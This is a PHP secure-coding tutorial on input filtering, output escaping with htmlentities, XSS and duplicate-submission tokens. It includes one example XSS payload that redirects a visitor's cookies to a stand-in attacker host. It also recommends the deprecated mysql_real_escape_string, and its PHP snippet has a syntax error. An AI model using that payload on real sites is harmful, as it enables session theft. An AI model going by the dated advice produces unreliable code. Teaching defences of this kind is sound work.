PHP Form validation and processing – part 3
Part 1 and Part 2 about the proper use of PHP forms dealt with form validation methods and error handling. The last section will cover how to process the submited data and how to protect your forms against misuse.
Filtering and Processing
Filtering is one of the cornerstones of web application security. By ensuring that all data is filtered, you can eliminate the risk that tainted data is trusted or misused. Proper filtering takes three steps:
- Identify the input
- Filter the data
- Distinguish between tainted and filtered data
Before you can filter your data you must know what it is and where it comes from. Input can be sent by the client, retrieved by a database or RSS feeds. Data that originates from the client can usually be accessed by the superglobal arrays $_GET and $_POST. You should always use this ones to prevent global variable injection and turn off register_globals in your php-ini settings.
The process of filtering the data accompanies the validation methodes descriped in the first parts. It is about preventing invalid data from entering the application.
After validating and filtering your data, it should be stored seperately for further processing. A handy way is storing the data in an array named $clean. By using only data within this array you can make sure that this data is ready for the application.
$clean = array();
if(ctype_alnum($_POST['username']){
$clean['username'] = $_POST['username'];
}
?>
Escaping user input
If you want to display user-entered data on your website you need to prevent Cross-Site Scripting (XSS) issues. XSS is one of the best known types of attacks to web applications. If input data by the user is not properly filtered and escaped, a cross-site scriptiong vulnerability exists. Consider the following approach where someone enters some Javascript to an input field which is diplayed unescaped on your site:
document.location =
'http://www.evilsite.com/stealdata.php?cookies=' + document.cookie
</script>
Because the risk exists only when you display tainted, unescaped data, you can simply prevent this attack by filtering input and escaping output. Latter can be attained by the use of htmlentities(), which converts all special characters to their equivalent HTML entity. An important step is, that all data must be escaped, even if it is stored (or displayed) in a database. A technique for MySQL is the mysql_real_escape_string() function.
Multiple form submissions
Another problem concerning forms is the user submitting the same form more than once. The following solution prevents the non-malicious attack and adds a barrier for a malicious user. It won’t eliminate all fraudulent use which would require more complicated work.
The solution basically creates an unique token placed in the form. On Submisson, you can check whether the token has already be processed or not. Submitted tokens can be stored in a SQLite database or a session for easy handling.
Leave a Reply